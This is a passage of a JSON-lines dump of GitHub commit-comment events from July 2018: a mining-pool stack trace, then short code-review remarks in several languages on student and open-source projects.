Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 9 died, spawning replacement worker...\r\n^C\r\n"}},"created_at":"2018-07-06T11:58:02Z"}
{"id":"7928505061","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620341,"position":61,"line":61,"path":"fetchfilmsbonus/FilmsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:58:45Z","updated_at":"2018-07-06T11:58:45Z","author_association":"NONE","body":"Немного последовательно, что в одном месте `film`, а в другом `movie` – оба слова означают ведь одно и то же."}},"created_at":"2018-07-06T11:58:45Z"}
{"id":"7928506379","type":"CommitCommentEvent","actor":{"login":"Chronos123"},"repo":{"name":"Chronos123/UriOnline"},"payload":{"comment":{"id":29620348,"position":null,"line":null,"path":null,"commit_id":"7937a1d665aac1e630047b885b947abf5699992e","created_at":"2018-07-06T11:59:03Z","updated_at":"2018-07-06T11:59:03Z","author_association":"OWNER","body":"Problemas resolvido em java"}},"created_at":"2018-07-06T11:59:03Z"}
{"id":"7928506441","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620349,"position":1,"line":1,"path":"fetchfilmsbonus/components/AssetExample.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:59:04Z","updated_at":"2018-07-06T11:59:04Z","author_association":"NONE","body":"Ненужный файл."}},"created_at":"2018-07-06T11:59:04Z"}
{"id":"7928506577","type":"CommitCommentEvent","actor":{"login":"xfap"},"repo":{"name":"xfap/SCAUSuccessors"},"payload":{"comment":{"id":29620350,"position":null,"line":null,"path":null,"commit_id":"df4157f4f12534f6ee7b49de1afa2a1f40912680","created_at":"2018-07-06T11:59:06Z","updated_at":"2018-07-06T11:59:06Z","author_association":"OWNER","body":"f"}},"created_at":"2018-07-06T11:59:06Z"}
{"id":"7928510048","type":"CommitCommentEvent","actor":{"login":"shdown"},"repo":{"name":"shdown/luastatus"},"payload":{"comment":{"id":29620354,"position":null,"line":null,"path":null,"commit_id":"b54df6264c8fac9a60a9b5d735fab93ab706f781","created_at":"2018-07-06T11:59:58Z","updated_at":"2018-07-06T11:59:58Z","author_association":"OWNER","body":"> сентрября\r\n\r\n\\>_~"}},"created_at":"2018-07-06T11:59:58Z"}
{"id":"7928510341","type":"CommitCommentEvent","actor":{"login":"mpoeter"},"repo":{"name":"neunhoef/asiotest"},"payload":{"comment":{"id":29620356,"position":124,"line":124,"path":"std_worker_farm.hpp","commit_id":"0ade7959121fc7e90afcdf82ea0675e9e3546d41","created_at":"2018-07-06T12:00:02Z","updated_at":"2018-07-06T12:00:02Z","author_association":"COLLABORATOR","body":"This should probably be a fetch_sub."}},"created_at":"2018-07-06T12:00:02Z"}
{"id":"7928510666","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620358,"position":1,"line":1,"path":"splitwise/App.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:00:08Z","updated_at":"2018-07-06T12:00:08Z","author_association":"NONE","body":"Отлично!"}},"created_at":"2018-07-06T12:00:08Z"}
{"id":"7928512636","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620365,"position":33,"line":33,"path":"splitwise/App.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:00:31Z","updated_at":"2018-07-06T12:00:31Z","author_association":"NONE","body":"Мелочь, но параметр лучше называть по теме – то есть тут бы подошёл `name`."}},"created_at":"2018-07-06T12:00:31Z"}
{"id":"7928513860","type":"CommitCommentEvent","actor":{"login":"krishna-waidande"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29620369,"position":22,"line":22,"path":"src/main/java/com/krishagni/participantcsv/rest/ParticipantCsvController.java","commit_id":"218665a529fa0931db80315b5f67753df0de25b6","created_at":"2018-07-06T12:00:48Z","updated_at":"2018-07-06T12:00:48Z","author_association":"OWNER","body":"Everywhere they are returning data added into JSON format. code gives response in the JSON format. ok sir I will also make changes in my code. and return the reponse in JSON format"}},"created_at":"2018-07-06T12:00:48Z"}
{"id":"7928517020","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620390,"position":83,"line":83,"path":"splitwise/components/AddBillModal.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:01:33Z","updated_at":"2018-07-06T12:01:33Z","author_association":"NONE","body":"Объединить надо было `handleAddBill` для своих биллов и биллов друзей – что ты и сделала. К этому методу претензий не было."}},"created_at":"2018-07-06T12:01:33Z"}
{"id":"7928519907","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620396,"position":83,"line":83,"path":"splitwise/components/AddBillModal.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:02:13Z","updated_at":"2018-07-06T12:02:13Z","author_association":"NONE","body":"Только вот названия этого метода и метода `descriptionChangeHandler` не соответствуют формату `handleDoSomething`."}},"created_at":"2018-07-06T12:02:13Z"}
{"id":"7928529773","type":"CommitCommentEvent","actor":{"login":"vantu5z"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29620424,"position":null,"line":null,"path":null,"commit_id":"4a122434a72e07047abf9dbb1a12f027b475e570","created_at":"2018-07-06T12:04:29Z","updated_at":"2018-07-06T12:04:29Z","author_association":"OWNER","body":"Нормально, зато понятно, что происходит"}},"created_at":"2018-07-06T12:04:29Z"}
{"id":"7928529787","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620425,"position":11,"line":11,"path":"splitwise/components/ChosenFriendModal.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:04:29Z","updated_at":"2018-07-06T12:04:29Z","author_association":"NONE","body":"Я уже писал про это раньше. Лучше было бы это написать как:\r\n\r\n```\r\nconst formattedEvents = events.map(event => ({\r\n  name: event.eventName,\r\n  money: event.money,\r\n}));\r\n```\r\n\r\nНо если честно, я вообще не вижу, зачем нужен создавать этот массив – почему нельзя просто передать `props.friend.events`?"}},"created_at":"2018-07-06T12:04:29Z"}
{"id":"7928531220","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29620428,"position":null,"line":null,"path":null,"commit_id":"6a11b617854864652af033296928bdd59f0f145e","created_at":"2018-07-06T12:04:50Z","updated_at":"2018-07-06T12:04:50Z","author_association":"NONE","body":"まずは昨日の授業内容のコードに対して、素早い修正ありがとうございます!\r\n見やすくいい感じのコードになっていますね。"}},"created_at":"2018-07-06T12:04:50Z"}
{"id":"7928532967","type":"CommitCommentEvent","actor":{"login":"nvmnghia"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29620433,"position":null,"line":null,"path":null,"commit_id":"6229b3ca8db1c0029838a40508dc41db01999b5a","created_at":"2018-07-06T12:05:16Z","updated_at":"2018-07-06T12:05:16Z","author_association":"NONE","body":"wow wow wow is this not a typo???"}},"created_at":"2018-07-06T12:05:16Z"}
{"id":"7928538671","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620440,"position":6,"line":6,"path":"splitwise/components/FriendSelectorItem.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T12:06:38Z","updated_at":"2018-07-06T12:06:38Z","author_association":"NONE","body":"Могла написать это как:\r\n\r\n```ts\r\nconst checked = props.involvedFriendIndexes.some(index => index === props.index);\r\n```\r\n\r\nЕсли не понятно, как работает `Array#some`, можешь почитать тут: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/some."}},"created_at":"2018-07-06T12:06:38Z"}
{"id":"7928546539","type":"CommitCommentEvent","actor":{"login":"alirizaadiyahsi"},"repo":{"name":"aspnetboilerplate/module-zero-template"},"payload":{"comment":{"id":29620458,"position":null,"line":null,"path":null,"commit_id":"48344db35d86d26e5f8150e8655aaf8b4b59c682","created_at":"2018-07-06T12:08:31Z","updated_at":"2018-07-06T12:08:31Z","author_association":"MEMBER","body":"We did not release yet. If you uncheck following checkbox, you can get latest development branch.\r\n\r\n![image](https://user-images.githubusercontent.com/4375000/42378030-6f8c75ea-812e-11e8-9871-e01d3e05b9be.png)\r\n"}},"created_at":"2018-07-06T12:08:31Z"}
{"id":"7928553680","type":"CommitCommentEvent","actor":{"login":"asRIA"},"repo":{"name":"juj/emsdk"},"payload":{"comment":{"id":29620473,"position":null,"line":null,"path":null,"commit_id":"ff627992cbed8c16a7a4ddb8449b9f1bea43b07b","created_at":"2018-07-06T12:10:15Z","updated_at":"2018-07-06T12:10:15Z","author_association":"NONE","body":"Hmm... Actually I'm having a compilation error in my docker image due this change: \r\n```\r\nprintf '#include <iostream>\\nint main(){std::cout<<\"HELLO FROM DOCKER C++\"<<std::endl;return 0;}' > test.cpp\r\nem++ -O2 test.cpp -o test.js && nodejs test.js\r\n\r\nemcc: cannot find binaryen js libraries (tried: ('/emsdk_portable/binaryen/bin', '/emsdk_portable/binaryen/share/binaryen'))\r\n```\r\n\r\n"}},"created_at":"2018-07-06T12:10:15Z"}
{"id":"7928555439","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29620484,"position":null,"line":null,"path":null,"commit_id":"6a11b617854864652af033296928bdd59f0f145e","created_at":"2018-07-06T12:10:41Z","updated_at":"2018-07-06T12:10:41Z","author_association":"NONE","body":"課題ですが、計算結果OKで、要求仕様をちゃんと満たしたいいコードですね。\r\n個人的には「割引率」を変数化して欲しかったので、0.2の部分だけを変数にして欲しいですが、\r\n0.2という数字が登場しているのでOKとします。\r\n\r\nあと、変数名について、細かくて申し訳ないのですが…\r\n・beal：英単語としては\"beer\"が正解です。\r\n・otyumami：「おちゅまみ」になってしまってます^^; 惜しいっ!\r\n・point_kard：「カード」の部分は英単語としては\"card\"が正解です。\r\n参考までに。"}},"created_at":"2018-07-06T12:10:41Z"}
{"id":"7928580569","type":"CommitCommentEvent","actor":{"login":"ffischer1984"},"repo":{"name":"nomssi/ABAP-to-PlantUML"},"payload":{"comment":{"id":29620538,"position":null,"line":null,"path":null,"commit_id":"7ac4c2e2b341b82acb17c8054d310ee29430ad7e","created_at":"2018-07-06T12:16:30Z","updated_at":"2018-07-06T12:16:30Z","author_association":"NONE","body":"xml-file is missing"}},"created_at":"2018-07-06T12:16:30Z"}
{"id":"7928580956","type":"CommitCommentEvent","actor":{"login":"kleest"},"repo":{"name":"viaduck/mariadbpp"},"payload":{"comment":{"id":29620539,"position":4,"line":13,"path":"include/mariadb++/types.hpp","commit_id":"7db2285d1c6ffe02f3e2ffa2bfb1f91fa0cf04d5","created_at":"2018-07-06T12:16:36Z","updated_at":"2018-07-06T12:16:36Z","author_association":"MEMBER","body":"This is interesting since on my system the header is still called `mysql_version.h`.\r\n\r\n```\r\n#define MYSQL_SERVER_VERSION\t\t\"10.1.34-MariaDB\"\r\n#define MYSQL_BASE_VERSION\t\t\"mysqld-10.1\"\r\n#define MARIADB_BASE_VERSION\t\t\"mariadb-10.1\"\r\n```\r\n```\r\nSystem: Arch Linux\r\nName            : libmariadbclient\r\nVersion         : 10.1.34-1\r\n```\r\n\r\nWhich system and package are you using?"}},"created_at":"2018-07-06T12:16:36Z"}
{"id":"7928582501","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29620543,"position":null,"line":null,"path":null,"commit_id":"f8b5a678851826054f88d1e9d73abd9232cc1f22","created_at":"2018-07-06T12:16:59Z","updated_at":"2018-07-06T12:16:59Z","author_association":"NONE","body":"読みやすくて、変数の使い方も出題意図に沿っているので、\r\nとってもいいコードなんですが、計算結果が間違ってます。惜しい!\r\n次回講義までに修正で再評価します。対応してみてください。\r\n\r\n間違えたポイント：\r\n・ポイント値引の部分がマイナスにマイナスで、結果プラスになっちゃってます。\r\n\r\n軽微な改善点：\r\n・出題時に変数に使う文字として「英小文字」と指定しましたので、\r\n　Yakitori → yakitori\r\n　が望ましいです。\r\n\r\n余談なんですが、多くのプログラミング言語では変数の先頭に英大文字を使わないのが\r\n一般的だったりします。\r\nその辺はお茶請けトーク的な感じで、今後講義で触れていきますね。"}},"created_at":"2018-07-06T12:16:59Z"}
{"id":"7928583839","type":"CommitCommentEvent","actor":{"login":"BIGJUN777"},"repo":{"name":"BIGJUN777/BIGJUN.github.io"},"payload":{"comment":{"id":29620547,"position":null,"line":null,"path":null,"commit_id":"e5b88a6be9bda60c3c11a86b85cea6b56403550d","created_at":"2018-07-06T12:17:18Z","updated_at":"2018-07-06T12:17:18Z","author_association":"OWNER","body":"Added CNAME file for custom domain (bigjun.me)"}},"created_at":"2018-07-06T12:17:18Z"}
{"id":"7928588665","type":"CommitCommentEvent","actor":{"login":"aledj2"},"repo":{"name":"moka-guys/workstation_crontab"},"payload":{"comment":{"id":29620553,"position":null,"line":null,"path":null,"commit_id":"73dd21eab3ec8f9c8dc47337752283a74b8ec95d","created_at":"2018-07-06T12:18:28Z","updated_at":"2018-07-06T12:18:28Z","author_association":"CONTRIBUTOR","body":"fixes woook/automate_demultiplex#217"}},"created_at":"2018-07-06T12:18:28Z"}
{"id":"7928589631","type":"CommitCommentEvent","actor":{"login":"JulyIGHOR"},"repo":{"name":"karalabe/xgo"},"payload":{"comment":{"id":29620554,"position":null,"line":null,"path":null,"commit_id":"647f256c447ee20f9bf13ebc42e612d55994a383","created_at":"2018-07-06T12:18:43Z","updated_at":"2018-07-06T12:18:43Z","author_association":"NONE","body":"> Where's that done in osxcross?\r\nIt done via osxcross/tools/gen_sdk_package.sh while building SDK achieve."}},"created_at":"2018-07-06T12:18:43Z"}
{"id":"7928589707","type":"CommitCommentEvent","actor":{"login":"seamus-45"},"repo":{"name":"shdown/luastatus"},"payload":{"comment":{"id":29620555,"position":null,"line":null,"path":null,"commit_id":"b54df6264c8fac9a60a9b5d735fab93ab706f781","created_at":"2018-07-06T12:18:44Z","updated_at":"2018-07-06T12:18:44Z","author_association":"CONTRIBUTOR","body":":baby: "}},"created_at":"2018-07-06T12:18:44Z"}
{"id":"7928595397","type":"CommitCommentEvent","actor":{"login":"paulenis"},"repo":{"name":"ramintaRain/C2D-front-end-1"},"payload":{"comment":{"id":29620579,"position":6,"line":5,"path":"README.md","commit_id":"ee22f8b3625c2e5a036ff3831b3143addb3d40e7","created_at":"2018-07-06T12:20:04Z","updated_at":"2018-07-06T12:20:04Z","author_association":"COLLABORATOR","body":"Decisions taken through discussion"}},"created_at":"2018-07-06T12:20:04Z"}
{"id":"7928596287","type":"CommitCommentEvent","actor":{"login":"paulenis"},"repo":{"name":"ramintaRain/C2D-front-end-1"},"payload":{"comment":{"id":29620582,"position":9,"line":8,"path":"README.md","commit_id":"ee22f8b3625c2e5a036ff3831b3143addb3d40e7","created_at":"2018-07-06T12:20:16Z","updated_at":"2018-07-06T12:20:16Z","author_association":"COLLABORATOR","body":"Clear and fair division of work and responsibilities at each stage of the project"}},"created_at":"2018-07-06T12:20:16Z"}
{"id":"7928596379","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29620583,"position":33,"line":70,"path":"wcfsetup/install/files/lib/system/package/PackageUninstallationDispatcher.class.php","commit_id":"24d20582922b6ee16b3538b9840b9c4465a9143a","created_at":"2018-07-06T12:20:17Z","updated_at":"2018-07-06T12:20:17Z","author_association":"CONTRIBUTOR","body":"what happens with plug-ins that don't deliver any files using the `file` PIP?"}},"created_at":"2018-07-06T12:20:17Z"}
{"id":"7928598506","type":"CommitCommentEvent","actor":{"login":"Paullsam"},"repo":{"name":"Paullsam/Test-teach"},"payload":{"comment":{"id":29620588,"position":1,"line":1,"path":"figures/lib/figures_collection.rb","commit_id":"0511a8a9ca3caa3de923d69467ab1560d714da34","created_at":"2018-07-06T12:20:46Z","updated_at":"2018-07-06T12:20:46Z","author_association":"OWNER","body":"у Figure есть методы сравнения и все остальные фигуры наследуются от него + в нем require всех фигур."}},"created_at":"2018-07-06T12:20:46Z"}
{"id":"7928601736","type":"CommitCommentEvent","actor":{"login":"muwongeemmanuel"},"repo":{"name":"muwongeemmanuel/recessgroup10"},"payload":{"comment":{"id":29620594,"position":null,"line":null,"path":null,"commit_id":"f8faffa36bb8d854f550740c89453e97e478422d","created_at":"2018-07-06T12:21:32Z","updated_at":"2018-07-06T12:21:32Z","author_association":"OWNER","body":"hi guys you can clone and then begin on other functionality from where I've stopped.\r\nthanks"}},"created_at":"2018-07-06T12:21:32Z"}
{"id":"7928602465","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"lim243/chat-app"},"payload":{"comment":{"id":29620597,"position":null,"line":null,"path":null,"commit_id":"989d604bec7a0072449ecf27d22b7aae4361e281","created_at":"2018-07-06T12:21:41Z","updated_at":"2018-07-06T12:21:41Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:21:41Z"}
{"id":"7928603832","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"lim243/chat-app"},"payload":{"comment":{"id":29620601,"position":null,"line":null,"path":null,"commit_id":"f70f3c629e2d84234cd2a1a16b7f509f5e4003cf","created_at":"2018-07-06T12:22:01Z","updated_at":"2018-07-06T12:22:01Z","author_association":"NONE","body":"Good job using CSS in JJS!"}},"created_at":"2018-07-06T12:22:01Z"}
{"id":"7928606221","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"lim243/chat-app"},"payload":{"comment":{"id":29620609,"position":null,"line":null,"path":null,"commit_id":"61947139b2eaf4b2e497ff67d5b5484aa2978db3","created_at":"2018-07-06T12:22:35Z","updated_at":"2018-07-06T12:22:35Z","author_association":"NONE","body":"Good work."}},"created_at":"2018-07-06T12:22:35Z"}
{"id":"7928637624","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Awnead/Slap"},"payload":{"comment":{"id":29620676,"position":null,"line":null,"path":null,"commit_id":"c54ea7e2df67de04cfae04727c5946af676dde5e","created_at":"2018-07-06T12:28:29Z","updated_at":"2018-07-06T12:28:29Z","author_association":"NONE","body":"Good work!"}},"created_at":"2018-07-06T12:28:29Z"}
{"id":"7928643007","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"AshleyStauffer/Chatarang"},"payload":{"comment":{"id":29620702,"position":null,"line":null,"path":null,"commit_id":"bbd1308a9654df2bc70afd2d4475b8d90fb7bffb","created_at":"2018-07-06T12:29:43Z","updated_at":"2018-07-06T12:29:43Z","author_association":"NONE","body":"Good job using CSS in JJS."}},"created_at":"2018-07-06T12:29:43Z"}
{"id":"7928643905","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"AshleyStauffer/Chatarang"},"payload":{"comment":{"id":29620705,"position":null,"line":null,"path":null,"commit_id":"f38768438ad61d0b3620acc9c0fef5890fb59e33","created_at":"2018-07-06T12:29:55Z","updated_at":"2018-07-06T12:29:55Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:29:55Z"}
{"id":"7928648566","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"AshleyStauffer/Chatarang"},"payload":{"comment":{"id":29620716,"position":null,"line":null,"path":null,"commit_id":"cfa59151706babc4d2314d3d468ba864922c32d5","created_at":"2018-07-06T12:30:54Z","updated_at":"2018-07-06T12:30:54Z","author_association":"NONE","body":"Good work 👍 "}},"created_at":"2018-07-06T12:30:54Z"}
{"id":"7928652949","type":"CommitCommentEvent","actor":{"login":"IlisiuAdrian"},"repo":{"name":"bmesesan/Test_nou"},"payload":{"comment":{"id":29620723,"position":null,"line":null,"path":null,"commit_id":"5b64a5969802f4c9bf54b617354d460b94612f9d","created_at":"2018-07-06T12:31:52Z","updated_at":"2018-07-06T12:31:52Z","author_association":"COLLABORATOR","body":"vreau tot programul"}},"created_at":"2018-07-06T12:31:52Z"}
{"id":"7928654035","type":"CommitCommentEvent","actor":{"login":"MarinaVector"},"repo":{"name":"htmlacademy-javascript/636943-keksobooking"},"payload":{"comment":{"id":29620726,"position":null,"line":null,"path":null,"commit_id":"a251e2a133822d192f328a1c89dd5a09c29b168c","created_at":"2018-07-06T12:32:09Z","updated_at":"2018-07-06T12:32:09Z","author_association":"NONE","body":"а7"}},"created_at":"2018-07-06T12:32:09Z"}
{"id":"7928660003","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Awnead/Slap"},"payload":{"comment":{"id":29620736,"position":null,"line":null,"path":null,"commit_id":"c54ea7e2df67de04cfae04727c5946af676dde5e","created_at":"2018-07-06T12:33:26Z","updated_at":"2018-07-06T12:33:26Z","author_association":"NONE","body":"Don't forget, commit messages should be in present tense and finish the sentence \"This commit will...\". So, for this particular commit, it should be \"Implement\" instead of \"Implemented.\""}},"created_at":"2018-07-06T12:33:26Z"}
{"id":"7928660148","type":"CommitCommentEvent","actor":{"login":"mchiapello"},"repo":{"name":"VIROPLANT/Dissemination"},"payload":{"comment":{"id":29620738,"position":null,"line":null,"path":null,"commit_id":"e40d4d87aae0a36dc76e06c09cbd1e545f624dbc","created_at":"2018-07-06T12:33:28Z","updated_at":"2018-07-06T12:33:28Z","author_association":"CONTRIBUTOR","body":"Sure?"}},"created_at":"2018-07-06T12:33:28Z"}
{"id":"7928661297","type":"CommitCommentEvent","actor":{"login":"mchiapello"},"repo":{"name":"VIROPLANT/Dissemination"},"payload":{"comment":{"id":29620739,"position":4,"line":4,"path":"labmeetings/PITCHME.md","commit_id":"e40d4d87aae0a36dc76e06c09cbd1e545f624dbc","created_at":"2018-07-06T12:33:43Z","updated_at":"2018-07-06T12:33:43Z","author_association":"CONTRIBUTOR","body":"remove this newline"}},"created_at":"2018-07-06T12:33:43Z"}
{"id":"7928664450","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620745,"position":null,"line":null,"path":null,"commit_id":"2b52f3339d2d661295dd09aafa5279ddb3e57dfa","created_at":"2018-07-06T12:34:24Z","updated_at":"2018-07-06T12:34:24Z","author_association":"NONE","body":"FWIW you will usually use those only once per app lifetime, it might not be worth keeping the values as class attributes, just passing those can be enough"}},"created_at":"2018-07-06T12:34:24Z"}
{"id":"7928665089","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620746,"position":null,"line":null,"path":null,"commit_id":"89647c020cbb260eae659b71c9eb280f670893e4","created_at":"2018-07-06T12:34:32Z","updated_at":"2018-07-06T12:34:32Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:34:32Z"}
{"id":"7928665942","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620749,"position":null,"line":null,"path":null,"commit_id":"0ee89f6b55cde2e22749e907bda85cfee8b3fe51","created_at":"2018-07-06T12:34:45Z","updated_at":"2018-07-06T12:34:45Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:34:45Z"}
{"id":"7928666796","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620751,"position":null,"line":null,"path":null,"commit_id":"ec490a6ec59a1235fde50a4c91d6286e30819d27","created_at":"2018-07-06T12:34:56Z","updated_at":"2018-07-06T12:34:56Z","author_association":"NONE","body":"Good work!"}},"created_at":"2018-07-06T12:34:56Z"}
{"id":"7928667984","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620759,"position":null,"line":null,"path":null,"commit_id":"2e91311bf9316b3766fc9a3800341e190d397973","created_at":"2018-07-06T12:35:14Z","updated_at":"2018-07-06T12:35:14Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:35:14Z"}
{"id":"7928668983","type":"CommitCommentEvent","actor":{"login":"djui"},"repo":{"name":"kisielk/errcheck"},"payload":{"comment":{"id":29620760,"position":31,"line":135,"path":"internal/errcheck/errcheck.go","commit_id":"4ad83318240dac4ff9011ae6c1ac62336516382e","created_at":"2018-07-06T12:35:28Z","updated_at":"2018-07-06T12:35:28Z","author_association":"NONE","body":"@kisielk Any specific reason to not also exclude `fmt.Fprint`, `fmt.Fprintf` and `fmt.Fprintln`?"}},"created_at":"2018-07-06T12:35:28Z"}
{"id":"7928669271","type":"CommitCommentEvent","actor":{"login":"rb6502"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29620762,"position":32,"line":2669,"path":"src/devices/machine/z80scc.cpp","commit_id":"44bc4d6bc32cffe6c4bea8b5f148b7663b62c781","created_at":"2018-07-06T12:35:32Z","updated_at":"2018-07-06T12:35:32Z","author_association":"CONTRIBUTOR","body":"That makes perfect sense!  I'll try it out after work today :)"}},"created_at":"2018-07-06T12:35:32Z"}
{"id":"7928671615","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620764,"position":46,"line":46,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"559dd33920f3c129f3ad229befe8a1ebad119c67","created_at":"2018-07-06T12:36:02Z","updated_at":"2018-07-06T12:36:02Z","author_association":"NONE","body":"This case might happen if we screw up something badly with the database model and have to recreate everything, so asserting probably isn't the correct thing to do :)"}},"created_at":"2018-07-06T12:36:02Z"}
{"id":"7928671622","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620765,"position":null,"line":null,"path":null,"commit_id":"b1e7ff1d1cb1f40d55b8f613d8dcbd522e2007ae","created_at":"2018-07-06T12:36:02Z","updated_at":"2018-07-06T12:36:02Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:36:02Z"}
{"id":"7928672603","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"avleen2898/chatarang"},"payload":{"comment":{"id":29620769,"position":null,"line":null,"path":null,"commit_id":"083e7b1ccaf64094bdea9b572e08d148e87ff87e","created_at":"2018-07-06T12:36:15Z","updated_at":"2018-07-06T12:36:15Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-06T12:36:15Z"}
{"id":"7928674905","type":"CommitCommentEvent","actor":{"login":"StefaniePors"},"repo":{"name":"SThanheiser/Specification_1.2-Translation_DE"},"payload":{"comment":{"id":29620776,"position":null,"line":null,"path":null,"commit_id":"e846fb61e32db2b607ff938a30b4669efa295680","created_at":"2018-07-06T12:36:46Z","updated_at":"2018-07-06T12:36:46Z","author_association":"COLLABORATOR","body":"[20180706_OC_Spec_v1.2_Translation-DE.docx](https://github.com/SThanheiser/Specification_1.2-Translation_DE/files/2170507/20180706_OC_Spec_v1.2_Translation-DE.docx)\r\n"}},"created_at":"2018-07-06T12:36:46Z"}
{"id":"7928676926","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620785,"position":null,"line":null,"path":null,"commit_id":"a5c01e8d60d5901e360517e7c513a0e168888f28","created_at":"2018-07-06T12:37:11Z","updated_at":"2018-07-06T12:37:11Z","author_association":"NONE","body":"Yeah! Kill those SVN leftovers!"}},"created_at":"2018-07-06T12:37:11Z"}
{"id":"7928679054","type":"CommitCommentEvent","actor":{"login":"chouquette"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29620789,"position":13,"line":31,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"b641688fedb71d6ff33399da119644b346d0c86b","created_at":"2018-07-06T12:37:39Z","updated_at":"2018-07-06T12:37:39Z","author_association":"NONE","body":"Is this some swiftery black magic? Or a forgotten //todo?"}},"created_at":"2018-07-06T12:37:39Z"}
